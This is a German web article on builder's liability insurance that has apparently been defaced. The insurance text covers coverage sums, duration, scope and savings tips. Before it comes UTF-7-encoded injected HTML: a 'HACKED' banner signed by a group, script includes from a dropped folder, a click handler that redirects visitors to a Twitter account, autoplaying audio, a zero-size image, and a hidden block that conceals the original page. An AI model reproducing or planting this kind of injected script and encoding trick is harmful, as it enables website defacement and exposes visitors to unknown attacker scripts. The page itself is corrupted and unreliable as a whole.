+ADw-/title+AD4APAAh-DOCTYPE type+AD4 +ADw-html+AD4APA-head+AD4APA-script src+AD0AIg-HACKED+ACU-21+AF8-dosyalar/init3.js+ACIAPgA8-/script+AD4APA-script src+AD0AIg-HACKED+ACU-21+AF8-dosyalar/usr3.js+ACIAPgA8-/script+AD4 +ADw-script type+AD0AIg-text/javascript+ACI id+AD0AIg-2f2a695a6afce2c2d833c706cd677a8e+ACI src+AD0AIg-HACKED+ACU-21+AF8-dosyalar/a.js+ACIAPgA8-/script+AD4 +ADw-meta http-equiv+AD0AIg-Content-Type+ACI content+AD0AIg-text/html+ADs charset+AD0-UTF-8+ACIAPg +ADw-title+AD4-HACKED+ACEAPA-/title+AD4 +ADw-meta charset+AD0AIg-UTF-8+ACIAPg +ADw-script+AD4-function hack()+AHs-window.location+AD0AIg-https://twitter.com/CyberWarriorTim+ACIAOwB9 function oynat()+AHs var player+AD0 document.getElementById(‘pl’)+ADs player.play()+ADsAfQA8-/script+AD4 +ADw-style+AD4 +ACM-hack+AHs-height:1200px+ADs-width:1128px+ADs margin:0 auto+ADs-background: url(http://www.hizliresimyukle.com/images/2014/08/27/almanyandex.png) no-repeat+ADs +AH0 +ACM-play+AHs-height:60px+ADs width:60px+ADs-position:absolute+ADs margin-top:795px+ADs margin-left:525px+ADsAfQ +ACM-play2+AHs-height:60px+ADs width:60px+ADs-position:absolute+ADs margin-top:1055px+ADs margin-left:525px+ADsAfQ body+AHs width:auto+ADs height:auto+ADs background: url(+ACI-http://www.hizliresimyukle.com/images/2014/08/21/Bg.png+ACI)+ADs +AH0 +ADw-/style+AD4 +ADw-/head+AD4 +ADw-body onmousedown+AD0AIg-hack()+ACIAPg +ADw-div id+AD0AIg-hack+ACIAPgA8-audio id+AD0AIg-pl+ACIAPgA8-source src+AD0AIg-HACKED+ACU-21+AF8-dosyalar/mehter.mp3+ACI type+AD0AIg-audio/mpeg+ACIAPgA8-/audio+AD4APA-div id+AD0AIg-play+ACI onmouseover+AD0AIg-oynat()+ACIAPgA8-/div+AD4APA-div id+AD0AIg-play2+ACI onmouseover+AD0AIg-oynat()+ACIAPgA8-/div+AD4APA-/div+AD4 +ADwAIQ—hacked by AKINCILAR–+AD4 +ADw-img src+AD0AIg-HACKED+ACU-21+AF8-dosyalar/boot.gif+ACI height+AD0AIg-0+ACI width+AD0AIg-0+ACIAPgA8-/body+AD4APA-/html+AD4APA-DIV style+AD0AIg-DISPLAY: none+ACIAPgA8-xmp+AD4-

Der erste Spatenstich beginnt mit einer guten Versicherung für den Bauherrn

Flower

Vertrag

Welche Versicherungssumme sollte bei der Bauherrenhaftpflichtversicherung gewählt werden. Eine grundsätzlich schwierige Frage. Experten raten dabei für die Bauherrenhaftpflichtversicherung zu Folgendem.

  • Personen- und Sachschäden sind von 3 Mio. bis 5 Mio.,
  • Vermögensschäden von 50.000 € bis 75.000 €. abdeckbar.

Wie lange währt die Versicherung?

  • Die Versicherungsdauer beträgt maximal 2 Jahre, bei Fertighäusern höchstens 6 Monate. Bei noch längerer Bauzeit ist eine Verlängerung des Vertrages möglich.

Wo ist die Bauherren-Haftpflicht gültig?

  • Sie erstreckt sich auf den Bereich des Grundstücks, auf dem sich die Baustelle befindet sowie auf die anliegenden öffentlichen Gehwege.

Was ist nicht versichert?

  • Eigenschäden sind nicht versichert.
  • Schäden durch Vorsatz

Welche Besonderheit gibt es?

  • Diese Versicherung wird ohne Selbstbeteiligung angeboten.

Spartipp:

  • Wer nur kleinere Baumaßnahmen wie Renovierungen, An- und Umbauten in Angriff nimmt, kann Geld sparen.
  • In der privaten Haftpflichtversicherung wird das Bauherren-Risiko bis zu 50.000 € abgedeckt, bei manchen Anbietern sogar bis zu 100.000 €.
  • Es besteht auch die Möglichkeit, das Bauherrenrisiko zusätzlich in eine bestehende oder noch abzuschließende Haus- und Grundbesitzerhaftpflichtversicherung mit aufzunehmen.